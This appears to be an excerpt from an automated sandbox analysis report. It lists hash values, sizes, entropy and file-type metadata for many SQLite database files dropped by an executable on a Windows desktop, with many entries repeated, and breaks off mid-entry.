                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
